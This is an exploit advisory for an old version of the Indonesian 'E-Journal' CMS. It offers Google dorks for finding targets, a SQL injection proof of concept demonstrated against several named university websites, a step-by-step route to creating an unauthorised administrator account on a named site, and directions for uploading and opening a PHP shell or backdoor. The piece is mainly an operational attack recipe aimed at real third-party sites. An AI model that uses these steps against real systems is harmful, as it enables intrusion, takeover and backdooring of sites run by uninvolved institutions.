E-Journal (Old Version) Multiple Vulnerabilities

Summary

E-Journal (Old Version) Multiple Vulnerabilities including; SQL Injection, Privilege Escalation and File Upload Vulnerability

Credit:

The information has been provided by X-Cisadane .


Details

Vulnerable Systems:
 * Google Chrome Version 39.0.2171.95 m (Windows 7 Ultimate 32-Bit English)

Patch Availability:
None

CVE Information:
None

DORKS (How to find the target) :

inurl:mahasiswa.php intitle:E-Journal
inurl:dosen.php intitle:E-Journal
inurl:jurnal.php intitle:E-Journal
inurl:dokumen.php intitle:E-Journal
‘Karya Tulis Mahasiswa’ intitle:E-Journal
‘Design & Programming by’ intitle:E-Journal
‘E-Journal adalah aplikasi berbasis web untuk’
Or use your own Google Dorks 🙂

P.S : This E-Journal CMS has 2 versions, The Old Version doesn’t have informasi.php (Informasi Menu).

Proof of Concept :

[ 1 ] SQL Injection
POC :
http://[Site]/[Path]/jurnal.php?detail=jurnal&id=[‘SQLi]

Example :
http://e-journal.uniga.ac.id/jurnal.php?detail=jurnal&id=’133
http://www.ejournal-fkipunibba.com/jurnal.php?detail=jurnal&id=’133
http://e-journal.uika-bogor.ac.id/jurnal.php?detail=jurnal&id=’133
http://ejurnal.unjani.ac.id/jurnal.php?detail=jurnal&id=’133
http://ejournal.stikesborromeus.ac.id/jurnal.php?detail=jurnal&id=’133
…etc…

[ 2 ] Privilege Escalation
You can create a new Administrator Account by Using this Trick.
For Example my Target is : http://www.ejournal-fisipunla.com/

Step 1 : Add data.php?tambah=dosen in the URL
So in this case the URL was http://www.ejournal-fisipunla.com/data.php?tambah=dosen

Step 2 : Then you can see this notice : ‘ANDA TIDAK BERHAK MENGAKSES HALAMAN INI. SILAHKAN ANDA LOGIN SEBAGAI ADMINISTRATOR’.
Ignore that Notice and click Admin Menu.
Screenshot #1 : http://i59.tinypic.com/54he2b.png

Step 3 : Tadaaa… Now you can add an Administrator Account.
Screenshot #2 : http://i59.tinypic.com/2i8vyus.png

[ 3 ] Upload PHP File (PHP Shell / Backdoor)
After New Administrator Account was Created, you can logon as an Administrator and Upload a Php File.

Admin Control Panel Path : http://[Site]/[Path]/admin.php
Example : http://www.ejournal-fisipunla.com/admin.php

Then Upload your PHP Shell / Backdoor from http://[Site]/[Path]/data.php?tambah=dosen
Upload your Php File in the File and Cover form.
Screenshot #3 : http://i59.tinypic.com/24cxhrc.png

Open your Backdoor / PHP Shell in :
http://[Site]/[Path]/cover/your php file name.php
http://[Site]/[Path]/file/your php file name.php

Categories: Exploits